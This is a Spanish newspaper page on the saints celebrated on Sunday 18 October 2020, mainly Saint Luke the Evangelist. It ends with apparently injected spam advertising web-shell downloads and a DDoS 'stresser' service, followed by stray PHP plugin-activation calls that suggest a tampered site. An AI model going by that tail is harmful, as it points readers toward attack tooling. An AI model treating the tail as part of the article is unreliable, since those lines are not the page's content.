¿Sabes qué santos se celebran hoy, domingo 18 de octubre? Consulta el santoral



Actualizado:18/10/2020 08:30h
Guardar

San Lucas Evangelista se celebra en el día de hoy, domingo 18 de octubre del 2020 según el calendario del santoral cristiano, entre otros nombres.

Según los más antiguos escritores eclesiásticos, era sirio y provenía del paganismo cuando muy poco después del tiempo de Jesús llegó a la fe cristiana. Las cartas de San Pablo lo muestran como compañero y discípulo del Apóstol. Dicen también que era médico, y en la segunda Carta de Timoteo se dice que no abandonó al santo cuando lo hicieron los demás. Se le atribuye desde muy antiguo el tercer Evangelio sinóptico y el libro de los Hechos de los Apóstoles.

En este domingo 18 de octubre de 2020 la iglesia católica celebra el santo de Amable de Riom, Asclepíades de Antioquía y Monón de Nassogne. Aunque el día de hoy es conocido por San Lucas Evangelista y con el que la religión católica hace homenaje a 48959 personas en España.

El Martirologio Romano recoge los nombres del santoral tal y como lo conocemos. Este nombre hace alusión a una especie de libro que el Vaticano va actualizando mediante la admisión de nuevos santos tras la canonización.

Hoy, domingo, 18 octubre 2020 son muchos los santos y santas que se festejan con motivo de esta tradición católica que tan intrínseca está en nuestra cultura diaria. Descubre en ABC todos los nombres del santoral que se celebran justo hoy.

Esta festividad ha conseguido que, por lo menos, una vez al año, los cristianos puedan festejar el día en el que el santo que lleva su nombre fue canonizado. ¿Pero qué significa esto? Celebrar el santo es celebrar la vida ejemplar de aquellos cristianos que nos precedieron y que llevan nuestro nombre. Y, aunque cada vez tiene menos repercusión en la sociedad comparado con épocas anteriores, son muchos los que aún festejan de manera activa este día.

¿Qué santos se celebran hoy 18 de octubre?

En la Iglesia Católica el número de santos, debido a su gran historia, es muy elevado, por lo que se conmemoran varias onomásticas en el mismo día. Hoy, 18 de octubre las personas que se llamen Amable de Riom, Asclepíades de Antioquía y Monón de Nassogne celebran su santo gracias a:

Amable de RiomAsclepíades de Antioquía y Monón de Nassogne

© Biblioteca de Autores Cristianos (J.L. Repetto, Todos los santos. 2007)

Ver los
comentariosTemas

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );